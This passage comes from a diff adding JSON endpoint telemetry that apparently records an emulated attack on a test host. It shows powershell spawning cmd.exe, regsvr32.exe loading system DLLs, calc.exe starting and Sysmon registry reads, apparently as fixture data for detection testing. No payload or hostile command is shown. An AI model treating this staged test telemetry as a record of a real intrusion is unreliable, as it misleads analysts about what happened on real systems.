"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 4664, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573243260000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "process", + "pid": 7428, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\System32\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001066605401}" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243230000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "process", + "pid": 4664, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00108A675401}" + }, + { + "event_type": "image_load", + "image_name": "wow64.dll", + "image_path": "C:\\Windows\\System32\\wow64.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "command_line": "\"C:\\WINDOWS\\system32\\cmd.exe\" /c ", + "event_type": "process", + "logon_id": 217055, + "parent_process_name": "powershell.exe", + "parent_process_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", + "pid": 6748, + "ppid": 7036, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "create", + "timestamp": 131883573243530000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}", + "unique_ppid": "{42FC7E13-C11D-5C05-0000-0010C6E90401}", + "user": "ART-DESKTOP\\bob", + "user_domain": "ART-DESKTOP", + "user_name": "bob" + }, + { + "event_type": "image_load", + "image_name": "wow64win.dll", + "image_path": "C:\\Windows\\System32\\wow64win.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243390000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\System32\\user32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "wow64cpu.dll", + "image_path": "C:\\Windows\\System32\\wow64cpu.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\SysWOW64\\KernelBase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "registry", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "registry_key": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion", + "registry_path": "HKU\\S-1-5-21-2047549730-3016700585-885829632-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\ApplicationAssociationToasts", + "registry_value": "ApplicationAssociationToasts", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "policymanager.dll", + "image_path": "C:\\Windows\\System32\\policymanager.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp110_win.dll", + "image_path": "C:\\Windows\\System32\\msvcp110_win.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\SysWOW64\\apphelp.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "apphelp.dll", + "image_path": "C:\\Windows\\System32\\apphelp.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "AcLayers.dll", + "image_path": "C:\\Windows\\SysWOW64\\AcLayers.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "cmd.exe", + "image_path": "C:\\Windows\\System32\\cmd.exe", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcrt.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ntdll.dll", + "image_path": "C:\\Windows\\System32\\ntdll.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "user32.dll", + "image_path": "C:\\Windows\\SysWOW64\\user32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "win32u.dll", + "image_path": "C:\\Windows\\SysWOW64\\win32u.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "gdi32full.dll", + "image_path": "C:\\Windows\\SysWOW64\\gdi32full.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcp_win.dll", + "image_path": "C:\\Windows\\SysWOW64\\msvcp_win.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ucrtbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\ucrtbase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "shell32.dll", + "image_path": "C:\\Windows\\SysWOW64\\shell32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243540000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "cfgmgr32.dll", + "image_path": "C:\\Windows\\SysWOW64\\cfgmgr32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "SHCore.dll", + "image_path": "C:\\Windows\\SysWOW64\\SHCore.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "rpcrt4.dll", + "image_path": "C:\\Windows\\SysWOW64\\rpcrt4.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sspicli.dll", + "image_path": "C:\\Windows\\SysWOW64\\sspicli.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "cryptbase.dll", + "image_path": "C:\\Windows\\SysWOW64\\cryptbase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "bcryptprimitives.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcryptprimitives.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sechost.dll", + "image_path": "C:\\Windows\\SysWOW64\\sechost.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "combase.dll", + "image_path": "C:\\Windows\\SysWOW64\\combase.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "windows.storage.dll", + "image_path": "C:\\Windows\\SysWOW64\\windows.storage.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "advapi32.dll", + "image_path": "C:\\Windows\\SysWOW64\\advapi32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "shlwapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\shlwapi.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel.appcore.dll", + "image_path": "C:\\Windows\\SysWOW64\\kernel.appcore.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "profapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\profapi.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "kernel32.dll", + "image_path": "C:\\Windows\\System32\\kernel32.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "powrprof.dll", + "image_path": "C:\\Windows\\SysWOW64\\powrprof.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "KernelBase.dll", + "image_path": "C:\\Windows\\System32\\KernelBase.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "fltLib.dll", + "image_path": "C:\\Windows\\SysWOW64\\fltLib.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "oleaut32.dll", + "image_path": "C:\\Windows\\SysWOW64\\oleaut32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "setupapi.dll", + "image_path": "C:\\Windows\\SysWOW64\\setupapi.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "msvcrt.dll", + "image_path": "C:\\Windows\\System32\\msvcrt.dll", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "image_load", + "image_name": "mpr.dll", + "image_path": "C:\\Windows\\SysWOW64\\mpr.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "winspool.drv", + "image_path": "C:\\Windows\\SysWOW64\\winspool.drv", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "propsys.dll", + "image_path": "C:\\Windows\\SysWOW64\\propsys.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "IPHLPAPI.DLL", + "image_path": "C:\\Windows\\SysWOW64\\IPHLPAPI.DLL", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "bcrypt.dll", + "image_path": "C:\\Windows\\SysWOW64\\bcrypt.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "sfc_os.dll", + "image_path": "C:\\Windows\\SysWOW64\\sfc_os.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243700016, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "imm32.dll", + "image_path": "C:\\Windows\\SysWOW64\\imm32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573243860000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "ole32.dll", + "image_path": "C:\\Windows\\SysWOW64\\ole32.dll", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "timestamp": 131883573244020000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "image_load", + "image_name": "WinTypes.dll", + "image_path": "C:\\Windows\\System32\\WinTypes.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "image_load", + "image_name": "dwmapi.dll", + "image_path": "C:\\Windows\\System32\\dwmapi.dll", + "pid": 4724, + "process_name": "calc.exe", + "process_path": "C:\\Windows\\System32\\calc.exe", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-001042525401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\WinTrust\\Trust Providers\\Software Publishing", + "registry_value": "Software Publishing", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "process", + "pid": 1284, + "process_name": "regsvr32.exe", + "process_path": "C:\\Windows\\SysWOW64\\regsvr32.exe", + "subtype": "terminate", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-00102A605401}" + }, + { + "event_type": "process", + "pid": 6748, + "process_name": "cmd.exe", + "process_path": "C:\\Windows\\System32\\cmd.exe", + "subtype": "terminate", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CBCC-5C05-0000-0010D1695401}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKU\\.DEFAULT\\Software\\Policies\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_value": "Disallowed", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\Certificates", + "registry_value": "Certificates", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CRLs", + "registry_value": "CRLs", + "timestamp": 131883573244650000, + "unique_pid": "{42FC7E13-CA8F-5C05-0000-0010DE794B01}" + }, + { + "event_type": "registry", + "pid": 2376, + "process_name": "Sysmon.exe", + "process_path": "C:\\WINDOWS\\Sysmon.exe", + "registry_key": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed", + "registry_path": "HKLM\\SOFTWARE\\Microsoft\\SystemCertificates\\Disallowed\\CTLs", + "registry_value": "CTLs", + "timestamp": 